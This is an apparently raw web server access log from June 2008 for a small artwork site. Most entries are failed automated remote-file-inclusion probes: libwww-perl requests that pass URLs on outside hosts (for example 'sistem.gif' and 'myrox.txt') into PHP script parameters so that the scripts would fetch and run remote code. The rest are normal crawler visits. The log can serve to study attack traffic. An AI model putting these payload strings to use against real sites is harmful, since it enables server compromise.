61.221.64.124 - - [27/Jun/2008:21:06:44 -0500] "GET /logs//errors.php?error=http://silenceisdefeat.org/~fantasize/text/tx.txt?t??t??t??? HTTP/1.1" 404 300 "-""libwww-perl/5.63"
61.221.64.124 - - [27/Jun/2008:21:06:45 -0500] "GET //errors.php?error=http://silenceisdefeat.org/~fantasize/text/tx.txt?t??t??t??? HTTP/1.1" 404 295 "-""libwww-perl/5.63"
219.154.22.244 - - [27/Jun/2008:21:06:48 -0500] "GET /logs//include/write.php?dir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 307 "-""libwww-perl/5.65"
219.154.22.244 - - [27/Jun/2008:21:06:49 -0500] "GET //include/write.php?dir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 302 "-""libwww-perl/5.65"
216.97.43.58 - - [27/Jun/2008:21:07:27 -0500] "GET /logs/send_reminders.php?includedir=http://alieandrann.net/id.txt??? HTTP/1.0" 404 295 "-""libwww-perl/5.53"
216.97.43.58 - - [27/Jun/2008:21:07:28 -0500] "GET /send_reminders.php?includedir=http://alieandrann.net/id.txt??? HTTP/1.0" 404 290 "-""libwww-perl/5.53"
208.75.225.10 - - [27/Jun/2008:21:08:50 -0500] "GET //include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.yksitie.net/nuoret/robots.txt?? HTTP/1.1" 404 323 "-""Advanced Browser (http://www.avantbrowser.com)"
201.245.12.66 - - [27/Jun/2008:21:10:32 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 348 "-""libwww-perl/5.76"
201.245.12.66 - - [27/Jun/2008:21:10:34 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 343 "-""libwww-perl/5.76"
202.53.78.212 - - [27/Jun/2008:21:12:08 -0500] "GET /logs//include/write.php?dir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
202.53.78.212 - - [27/Jun/2008:21:12:09 -0500] "GET //include/write.php?dir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
85.214.33.25 - - [27/Jun/2008:21:12:22 -0500] "GET /logs/access_log.1207785600//skin/zero_vote/error.php?dir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
85.214.33.25 - - [27/Jun/2008:21:12:22 -0500] "GET //skin/zero_vote/error.php?dir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
85.214.33.25 - - [27/Jun/2008:21:12:23 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
85.214.33.25 - - [27/Jun/2008:21:13:56 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 311 "-""libwww-perl/5.803"
85.214.33.25 - - [27/Jun/2008:21:13:56 -0500] "GET //config/dbutil.bck.php?confdir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 306 "-""libwww-perl/5.803"
202.86.8.102 - - [27/Jun/2008:21:17:38 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
202.86.8.102 - - [27/Jun/2008:21:17:38 -0500] "GET //config/dbutil.bck.php?confdir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
59.188.4.56 - - [27/Jun/2008:21:17:47 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 311 "-""libwww-perl/5.79"
59.188.4.56 - - [27/Jun/2008:21:17:48 -0500] "GET //config/dbutil.bck.php?confdir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
219.154.22.244 - - [27/Jun/2008:21:19:56 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 311 "-""libwww-perl/5.65"
219.154.22.244 - - [27/Jun/2008:21:19:57 -0500] "GET //config/dbutil.bck.php?confdir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 306 "-""libwww-perl/5.65"
219.93.96.46 - - [27/Jun/2008:21:20:56 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
202.53.78.212 - - [27/Jun/2008:21:22:21 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 311 "-""libwww-perl/5.79"
202.53.78.212 - - [27/Jun/2008:21:22:21 -0500] "GET //config/dbutil.bck.php?confdir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
201.245.12.66 - - [27/Jun/2008:21:22:36 -0500] "GET /logs/errors.php?error=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 299 "-""libwww-perl/5.76"
201.245.12.66 - - [27/Jun/2008:21:22:38 -0500] "GET /errors.php?error=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 294 "-""libwww-perl/5.76"
201.245.12.66 - - [27/Jun/2008:21:23:04 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 343 "-""libwww-perl/5.76"
201.245.12.66 - - [27/Jun/2008:21:23:07 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 338 "-""libwww-perl/5.76"
85.214.33.25 - - [27/Jun/2008:21:23:33 -0500] "GET /logs//atom.php5?page=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
85.214.33.25 - - [27/Jun/2008:21:23:33 -0500] "GET //atom.php5?page=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
85.214.33.25 - - [27/Jun/2008:21:23:44 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
85.214.33.25 - - [27/Jun/2008:21:23:44 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 316 "-""libwww-perl/5.803"
202.53.78.212 - - [27/Jun/2008:21:24:11 -0500] "GET /logs//errors.php?error=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
202.53.78.212 - - [27/Jun/2008:21:24:12 -0500] "GET //errors.php?error=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
219.154.22.244 - - [27/Jun/2008:21:25:53 -0500] "GET /logs//errors.php?error=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 300 "-""libwww-perl/5.65"
219.154.22.244 - - [27/Jun/2008:21:25:54 -0500] "GET //errors.php?error=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 295 "-""libwww-perl/5.65"
59.188.4.56 - - [27/Jun/2008:21:26:38 -0500] "GET /logs//atom.php5?page=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
59.188.4.56 - - [27/Jun/2008:21:26:39 -0500] "GET //atom.php5?page=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
61.63.1.134 - - [27/Jun/2008:21:27:04 -0500] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 404 365 "-""libwww-perl/5.65"
61.63.1.134 - - [27/Jun/2008:21:27:04 -0500] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 404 360 "-""libwww-perl/5.65"
202.86.8.102 - - [27/Jun/2008:21:28:25 -0500] "GET /logs//errors.php?error=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
202.86.8.102 - - [27/Jun/2008:21:28:25 -0500] "GET //errors.php?error=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
59.188.4.56 - - [27/Jun/2008:21:29:23 -0500] "GET /logs//errors.php?error=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
59.188.4.56 - - [27/Jun/2008:21:29:24 -0500] "GET //errors.php?error=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
202.86.8.102 - - [27/Jun/2008:21:30:10 -0500] "GET /logs//atom.php5?page=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
202.86.8.102 - - [27/Jun/2008:21:30:10 -0500] "GET //atom.php5?page=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
81.149.13.26 - - [27/Jun/2008:21:30:27 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; MojeekBot/2.0; http://www.mojeek.com/bot.html)"
81.149.13.26 - - [27/Jun/2008:21:30:27 -0500] "GET /artwork/sculptures.htm HTTP/1.1" 200 3706 "-""Mozilla/5.0 (compatible; MojeekBot/2.0; http://www.mojeek.com/bot.html)"
81.149.13.26 - - [27/Jun/2008:21:30:37 -0500] "GET /artwork/toys.htm HTTP/1.1" 200 1337 "-""Mozilla/5.0 (compatible; MojeekBot/2.0; http://www.mojeek.com/bot.html)"
81.149.13.26 - - [27/Jun/2008:21:30:45 -0500] "GET /artwork/carousel.htm HTTP/1.1" 200 814 "-""Mozilla/5.0 (compatible; MojeekBot/2.0; http://www.mojeek.com/bot.html)"
212.220.139.98 - - [27/Jun/2008:21:30:53 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.spsss.ru/exhibition/mc?? HTTP/1.1" 404 311 "-""libwww-perl/5.79"
212.220.139.98 - - [27/Jun/2008:21:30:53 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.spsss.ru/exhibition/mc?? HTTP/1.1" 404 311 "-""libwww-perl/5.79"
212.220.139.98 - - [27/Jun/2008:21:30:53 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.spsss.ru/exhibition/mc?? HTTP/1.1" 404 311 "-""libwww-perl/5.79"
212.220.139.98 - - [27/Jun/2008:21:30:54 -0500] "GET //config/dbutil.bck.php?confdir=http://www.spsss.ru/exhibition/mc?? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
212.220.139.98 - - [27/Jun/2008:21:30:54 -0500] "GET //config/dbutil.bck.php?confdir=http://www.spsss.ru/exhibition/mc?? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
212.220.139.98 - - [27/Jun/2008:21:30:54 -0500] "GET //config/dbutil.bck.php?confdir=http://www.spsss.ru/exhibition/mc?? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
212.220.139.98 - - [27/Jun/2008:21:30:54 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.spsss.ru/exhibition/mc?? HTTP/1.1" 404 311 "-""libwww-perl/5.79"
81.149.13.26 - - [27/Jun/2008:21:30:54 -0500] "GET /artwork/puzzles.htm HTTP/1.1" 200 1591 "-""Mozilla/5.0 (compatible; MojeekBot/2.0; http://www.mojeek.com/bot.html)"
212.220.139.98 - - [27/Jun/2008:21:30:54 -0500] "GET //config/dbutil.bck.php?confdir=http://www.spsss.ru/exhibition/mc?? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
81.149.13.26 - - [27/Jun/2008:21:31:02 -0500] "GET /artwork/banners.htm HTTP/1.1" 200 3537 "-""Mozilla/5.0 (compatible; MojeekBot/2.0; http://www.mojeek.com/bot.html)"
81.149.13.26 - - [27/Jun/2008:21:31:10 -0500] "GET /artwork/dressers.htm HTTP/1.1" 200 1093 "-""Mozilla/5.0 (compatible; MojeekBot/2.0; http://www.mojeek.com/bot.html)"
81.149.13.26 - - [27/Jun/2008:21:31:19 -0500] "GET /artwork/playhouse.htm HTTP/1.1" 200 521 "-""Mozilla/5.0 (compatible; MojeekBot/2.0; http://www.mojeek.com/bot.html)"
81.149.13.26 - - [27/Jun/2008:21:31:27 -0500] "GET /artwork/artmaster.htm HTTP/1.1" 200 886 "-""Mozilla/5.0 (compatible; MojeekBot/2.0; http://www.mojeek.com/bot.html)"
81.149.13.26 - - [27/Jun/2008:21:31:36 -0500] "GET /artwork/mirrors.htm HTTP/1.1" 200 1118 "-""Mozilla/5.0 (compatible; MojeekBot/2.0; http://www.mojeek.com/bot.html)"
81.149.13.26 - - [27/Jun/2008:21:31:45 -0500] "GET /artwork/trunks.htm HTTP/1.1" 200 1275 "-""Mozilla/5.0 (compatible; MojeekBot/2.0; http://www.mojeek.com/bot.html)"
81.149.13.26 - - [27/Jun/2008:21:31:54 -0500] "GET /artwork/furniture.htm HTTP/1.1" 200 1004 "-""Mozilla/5.0 (compatible; MojeekBot/2.0; http://www.mojeek.com/bot.html)"
81.149.13.26 - - [27/Jun/2008:21:32:08 -0500] "GET /artwork/hospitals.htm HTTP/1.1" 200 3315 "-""Mozilla/5.0 (compatible; MojeekBot/2.0; http://www.mojeek.com/bot.html)"
81.149.13.26 - - [27/Jun/2008:21:32:20 -0500] "GET /artwork/menorahs.htm HTTP/1.1" 200 1007 "-""Mozilla/5.0 (compatible; MojeekBot/2.0; http://www.mojeek.com/bot.html)"
81.149.13.26 - - [27/Jun/2008:21:32:28 -0500] "GET /artwork/dioramas.htm HTTP/1.1" 200 1230 "-""Mozilla/5.0 (compatible; MojeekBot/2.0; http://www.mojeek.com/bot.html)"
81.149.13.26 - - [27/Jun/2008:21:32:40 -0500] "GET /artwork/jewelrybox.htm HTTP/1.1" 200 827 "-""Mozilla/5.0 (compatible; MojeekBot/2.0; http://www.mojeek.com/bot.html)"
81.149.13.26 - - [27/Jun/2008:21:32:48 -0500] "GET /artwork/whirligigs.htm HTTP/1.1" 200 985 "-""Mozilla/5.0 (compatible; MojeekBot/2.0; http://www.mojeek.com/bot.html)"
81.149.13.26 - - [27/Jun/2008:21:32:58 -0500] "GET /artwork/music.htm HTTP/1.1" 200 577 "-""Mozilla/5.0 (compatible; MojeekBot/2.0; http://www.mojeek.com/bot.html)"
81.149.13.26 - - [27/Jun/2008:21:33:07 -0500] "GET /artwork/mobiles.htm HTTP/1.1" 200 986 "-""Mozilla/5.0 (compatible; MojeekBot/2.0; http://www.mojeek.com/bot.html)"
81.149.13.26 - - [27/Jun/2008:21:33:15 -0500] "GET /artwork/postcards.htm HTTP/1.1" 200 690 "-""Mozilla/5.0 (compatible; MojeekBot/2.0; http://www.mojeek.com/bot.html)"
81.149.13.26 - - [27/Jun/2008:21:33:22 -0500] "GET /artwork/miscellaneous.htm HTTP/1.1" 404 309 "-""Mozilla/5.0 (compatible; MojeekBot/2.0; http://www.mojeek.com/bot.html)"
81.149.13.26 - - [27/Jun/2008:21:33:31 -0500] "GET /artwork/paintings.htm HTTP/1.1" 200 2300 "-""Mozilla/5.0 (compatible; MojeekBot/2.0; http://www.mojeek.com/bot.html)"
219.154.22.244 - - [27/Jun/2008:21:33:32 -0500] "GET /logs//atom.php5?page=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
219.154.22.244 - - [27/Jun/2008:21:33:32 -0500] "GET //atom.php5?page=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
202.53.78.212 - - [27/Jun/2008:21:36:12 -0500] "GET /logs//atom.php5?page=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
202.53.78.212 - - [27/Jun/2008:21:36:13 -0500] "GET //atom.php5?page=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
209.62.115.202 - - [27/Jun/2008:21:39:34 -0500] "GET /logs/access_log.1207785600//Neos_Chronos/header.php?base_folder=http://www.donorweb.org/redfox/myrox.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.811"
209.62.115.202 - - [27/Jun/2008:21:39:34 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.donorweb.org/redfox/myrox.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.811"
209.62.115.202 - - [27/Jun/2008:21:39:34 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.donorweb.org/redfox/myrox.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.811"
219.154.22.244 - - [27/Jun/2008:21:40:25 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
219.154.22.244 - - [27/Jun/2008:21:40:26 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 316 "-""libwww-perl/5.65"
64.90.163.98 - - [27/Jun/2008:21:40:35 -0500] "GET /logs/access_log.1207785600//Neos_Chronos/header.php?base_folder=http://www.geo-mobile.com/nuke/modules/Forums/images/avatars/.../id.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
64.90.163.98 - - [27/Jun/2008:21:40:35 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.geo-mobile.com/nuke/modules/Forums/images/avatars/.../id.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
64.90.163.98 - - [27/Jun/2008:21:40:35 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.geo-mobile.com/nuke/modules/Forums/images/avatars/.../id.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
205.234.215.99 - - [27/Jun/2008:21:43:47 -0500] "GET /logs/access_log.1207785600//modules/TotalCalendar/about.php?inc_dir=http://www.hostdehein.de//lcl/bilder/data/media/6/P1010161.JPG??? HTTP/1.1" 404 343 "-""libwww-perl/5.811"
205.234.215.99 - - [27/Jun/2008:21:43:47 -0500] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.hostdehein.de//lcl/bilder/data/media/6/P1010161.JPG??? HTTP/1.1" 404 316 "-""libwww-perl/5.811"
205.234.215.99 - - [27/Jun/2008:21:43:47 -0500] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.hostdehein.de//lcl/bilder/data/media/6/P1010161.JPG??? HTTP/1.1" 404 321 "-""libwww-perl/5.811"
202.86.8.102 - - [27/Jun/2008:21:44:34 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
202.86.8.102 - - [27/Jun/2008:21:44:34 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
219.93.96.46 - - [27/Jun/2008:21:44:55 -0500] "GET /logs//include/write.php?dir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
219.93.96.46 - - [27/Jun/2008:21:44:57 -0500] "GET //include/write.php?dir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
209.132.97.196 - - [27/Jun/2008:21:45:20 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "-""WebRingChecker/1.71 LWP/5.79"
209.62.115.202 - - [27/Jun/2008:21:45:48 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.donorweb.org/redfox/myrox.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.811"
209.62.115.202 - - [27/Jun/2008:21:45:48 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.donorweb.org/redfox/myrox.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.811"
201.245.12.66 - - [27/Jun/2008:21:46:13 -0500] "GET /logs//include/write.php?dir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 307 "-""libwww-perl/5.76"
201.245.12.66 - - [27/Jun/2008:21:46:14 -0500] "GET //include/write.php?dir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 302 "-""libwww-perl/5.76"
219.93.96.46 - - [27/Jun/2008:21:46:32 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 311 "-""libwww-perl/5.79"
219.93.96.46 - - [27/Jun/2008:21:46:34 -0500] "GET //config/dbutil.bck.php?confdir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
61.246.6.245 - - [27/Jun/2008:21:46:42 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 311 "-""libwww-perl/5.79"
61.246.6.245 - - [27/Jun/2008:21:46:43 -0500] "GET //config/dbutil.bck.php?confdir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
219.93.96.46 - - [27/Jun/2008:21:47:04 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
219.93.96.46 - - [27/Jun/2008:21:47:06 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
200.55.206.49 - - [27/Jun/2008:21:48:47 -0500] "GET /logs//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 344 "-""libwww-perl/5.65"
200.55.206.49 - - [27/Jun/2008:21:48:48 -0500] "GET //modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.65"
219.93.96.46 - - [27/Jun/2008:21:49:02 -0500] "GET /logs/errors.php?error=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
219.93.96.46 - - [27/Jun/2008:21:49:03 -0500] "GET /errors.php?error=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
74.6.18.238 - - [27/Jun/2008:21:50:10 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.52.54 - - [27/Jun/2008:21:50:11 -0500] "GET /costume/ HTTP/1.0" 200 640 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
219.93.96.46 - - [27/Jun/2008:21:51:20 -0500] "GET /logs//atom.php5?page=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
219.93.96.46 - - [27/Jun/2008:21:51:21 -0500] "GET //atom.php5?page=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
209.62.115.202 - - [27/Jun/2008:21:52:22 -0500] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.donorweb.org/redfox/myrox.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.811"
209.62.115.202 - - [27/Jun/2008:21:52:22 -0500] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.donorweb.org/redfox/myrox.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.811"
201.245.12.66 - - [27/Jun/2008:21:53:59 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 311 "-""libwww-perl/5.76"
201.245.12.66 - - [27/Jun/2008:21:53:59 -0500] "GET //config/dbutil.bck.php?confdir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 306 "-""libwww-perl/5.76"
201.245.12.66 - - [27/Jun/2008:21:54:34 -0500] "GET /logs//atom.php5?page=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 299 "-""libwww-perl/5.76"
201.245.12.66 - - [27/Jun/2008:21:54:34 -0500] "GET //atom.php5?page=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 294 "-""libwww-perl/5.76"
67.195.98.217 - - [27/Jun/2008:21:58:16 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
59.188.4.56 - - [27/Jun/2008:22:02:35 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
59.188.4.56 - - [27/Jun/2008:22:02:35 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
64.90.163.98 - - [27/Jun/2008:22:04:57 -0500] "GET //oneadmin/photogallery/include.php?path[docroot]=http://www.geo-mobile.com/nuke/modules/Forums/images/avatars/.../id.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
64.90.163.98 - - [27/Jun/2008:22:05:04 -0500] "GET //oneadmin/photogallery/include.php?path[docroot]=http://www.geo-mobile.com/nuke/modules/Forums/images/avatars/.../id.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
201.245.12.66 - - [27/Jun/2008:22:14:09 -0500] "GET /logs//errors.php?error=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 300 "-""libwww-perl/5.76"
201.245.12.66 - - [27/Jun/2008:22:14:10 -0500] "GET //errors.php?error=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 295 "-""libwww-perl/5.76"
209.62.115.202 - - [27/Jun/2008:22:19:14 -0500] "GET /logs/access_log.1207785600//oneadmin/photogallery/include.php?path[docroot]=http://www.donorweb.org/redfox/myrox.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.811"
209.62.115.202 - - [27/Jun/2008:22:19:14 -0500] "GET //oneadmin/photogallery/include.php?path[docroot]=http://www.donorweb.org/redfox/myrox.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.811"
209.62.115.202 - - [27/Jun/2008:22:19:14 -0500] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://www.donorweb.org/redfox/myrox.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.811"
202.138.187.186 - - [27/Jun/2008:22:19:34 -0500] "GET /logs//errors.php?error=http://www.dennisw.idv.tw:8080/xoops/modules/agendax/mc??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
202.138.187.186 - - [27/Jun/2008:22:19:34 -0500] "GET /logs//errors.php?error=http://www.dennisw.idv.tw:8080/xoops/modules/agendax/mc??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
202.138.187.186 - - [27/Jun/2008:22:19:34 -0500] "GET //errors.php?error=http://www.dennisw.idv.tw:8080/xoops/modules/agendax/mc??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
202.138.187.186 - - [27/Jun/2008:22:19:34 -0500] "GET //errors.php?error=http://www.dennisw.idv.tw:8080/xoops/modules/agendax/mc??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
216.99.193.134 - - [27/Jun/2008:22:23:34 -0500] "GET /logs/access_log.1207785600//skin/zero_vote/error.php?dir=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 336 "-""libwww-perl/5.65"
216.99.193.134 - - [27/Jun/2008:22:23:35 -0500] "GET //skin/zero_vote/error.php?dir=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 309 "-""libwww-perl/5.65"
216.99.193.134 - - [27/Jun/2008:22:23:35 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 314 "-""libwww-perl/5.65"
